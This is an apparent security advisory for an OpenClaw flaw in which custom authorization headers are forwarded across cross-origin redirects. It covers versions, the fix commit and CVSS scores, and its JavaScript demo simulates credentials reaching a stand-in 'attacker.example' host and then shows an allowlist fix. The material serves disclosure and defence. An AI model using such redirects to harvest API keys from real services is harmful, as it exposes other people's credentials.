OpenClaw before 2026.3.7 contains an improper header validation vulnerability in fetchWithSsrFGuard that forwards custom authorization…
VulnCheck·CWE-522·Published 2026-03-09
OpenClaw before 2026.3.7 contains an improper header validation vulnerability in fetchWithSsrFGuard that forwards custom authorization headers across cross-origin redirects. Attackers can trigger redirects to different origins to intercept sensitive headers like X-Api-Key and Private-Token intended for the original destination.
OpenClaw's `fetchWithSsrFGuard(...)` followed cross-origin redirects while preserving arbitrary caller-supplied headers except for a narrow denylist (`Authorization`, `Proxy-Authorization`, `Cookie`, `Cookie2`). This allowed custom authorization headers such as `X-Api-Key`, `Private-Token`, and similar sensitive headers to be forwarded to a different origin after a redirect. The fix switches cross-origin redirect handling from a narrow sensitive-header denylist to a safe-header allowlist, so only benign headers such as content negotiation and cache validators survive an origin change.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Affected versions: `<= 2026.3.2`
- Patched version: `2026.3.7`
- Latest published npm version at patch time: `2026.3.2`

## Impact

A remote service that could trigger a redirect across origins could receive custom authorization credentials attached by OpenClaw callers. This can expose API keys, bearer-style custom headers, or private token headers intended only for the original destination.

## Fix Commit(s)

- `46715371b0612a6f9114dffd1466941ac476cef5`

## Verification

- `pnpm check` passed
- `pnpm test:fast` passed
- Focused redirect regression tests passed
- `pnpm exec vitest run --config vitest.gateway.config.ts` still has unrelated current-`main` failures in `src/gateway/server-channels.test.ts` and `src/gateway/server-methods/agents-mutate.test.ts`

## Release Process Note

npm `2026.3.7` was published on March 8, 2026. This advisory is fixed in the released package.

Thanks @Rickidevs for reporting.
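The denylist-versus-allowlist point in the advisory, as an added example that is not OpenClaw's own `fetchWithSsrFGuard` code: a minimal redirect-following wrapper whose header policy is selectable, driven against a constructed in-memory network in which the intended destination `api.example` answers with a 302 to `attacker.example`, which records every header it receives. The hostnames, the credential values, and the contents of `SAFE_ALLOWLIST` are assumptions for this example; the exact allowlist in the fix commit is not reproduced here.

```javascript
// Added example (not OpenClaw's code): a redirect-following fetch wrapper with the
// pre-2026.3.7 denylist policy beside an allowlist policy of the kind the fix adopts.

// Headers the vulnerable code stripped on a cross-origin redirect: the narrow
// denylist named in the advisory. Everything else, X-Api-Key included, was forwarded.
const SENSITIVE_DENYLIST = new Set(["authorization", "proxy-authorization", "cookie", "cookie2"]);

// Headers allowed to cross an origin boundary: content negotiation and cache
// validators. This list is an assumption for the example.
const SAFE_ALLOWLIST = new Set([
  "accept", "accept-language", "accept-encoding", "user-agent",
  "if-none-match", "if-modified-since",
]);

// Decide which request headers survive a redirect from `fromUrl` to `toUrl`.
// URL.origin is scheme + host + port, so a port or scheme change counts as cross-origin.
function headersForRedirect(fromUrl, toUrl, headers, policy) {
  const out = new Headers();
  const crossOrigin = fromUrl.origin !== toUrl.origin;
  for (const [name, value] of headers) { // Headers iteration yields lowercase names
    let keep = true;
    if (crossOrigin) {
      keep = policy === "denylist" ? !SENSITIVE_DENYLIST.has(name) : SAFE_ALLOWLIST.has(name);
    }
    if (keep) out.set(name, value);
  }
  return out;
}

// Follow 3xx responses manually so the header policy, not the runtime, decides what
// is re-sent. `fetchImpl(url, headers)` returns a Response and is injectable so the
// example runs offline against a constructed network instead of the real fetch.
function fetchFollowingRedirects(url, headers, policy, fetchImpl, maxRedirects = 5) {
  let current = new URL(url);
  let currentHeaders = new Headers(headers);
  for (let hop = 0; hop <= maxRedirects; hop++) {
    const res = fetchImpl(current, currentHeaders);
    const location = res.headers.get("location");
    if (res.status < 300 || res.status > 399 || location === null) return res;
    const next = new URL(location, current); // Location may be relative to the current URL
    currentHeaders = headersForRedirect(current, next, currentHeaders, policy);
    current = next;
  }
  throw new Error("too many redirects");
}

// Constructed in-memory network: api.example (the intended destination) redirects
// to attacker.example, and every origin records the headers it received.
function makeNetwork() {
  const received = {};
  const fetchImpl = (url, headers) => {
    received[url.origin] = Object.fromEntries(headers);
    if (url.hostname === "api.example") {
      return new Response(null, { status: 302, headers: { location: "https://attacker.example/collect" } });
    }
    return new Response("ok", { status: 200 });
  };
  return { fetchImpl, received };
}

// Send one credentialed request under the given policy and return what attacker.example saw.
function headersSeenByAttacker(policy) {
  const { fetchImpl, received } = makeNetwork();
  const requestHeaders = { // constructed placeholder credentials, not real secrets
    "X-Api-Key": "sk-example-123",
    "Private-Token": "glpat-example",
    Authorization: "Bearer example",
    Accept: "application/json",
  };
  fetchFollowingRedirects("https://api.example/v1/items", requestHeaders, policy, fetchImpl);
  return received["https://attacker.example"] ?? {};
}

// Demonstration when run directly: the denylist leaks x-api-key and private-token
// (only authorization is stripped); the allowlist forwards only accept.
console.log("denylist  ->", headersSeenByAttacker("denylist"));
console.log("allowlist ->", headersSeenByAttacker("allowlist"));
```

Two details worth keeping when porting this check: compare `URL.origin` rather than hostnames, so that a redirect to the same host on a different port or scheme is also treated as cross-origin, and resolve `Location` against the current URL, since a relative redirect stays on the same origin and should keep its headers.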
| CVSS version | Type | Source | Base score | Exploitability subscore | Impact subscore | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | cve.org | 9.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N |
| 3.1 | Primary | NVD | 9.1 | 3.9 | 5.2 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| 3.1 | Secondary | GHSA | 9.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N |
| 3.1 | Secondary | NVD | 9.3 | 3.9 | 4.7 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N |
| 4.0 | Primary | cve.org | 8.8 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N |
| 4.0 | Secondary | GHSA | 8.8 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N |
| 4.0 | Secondary | NVD | 8.8 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |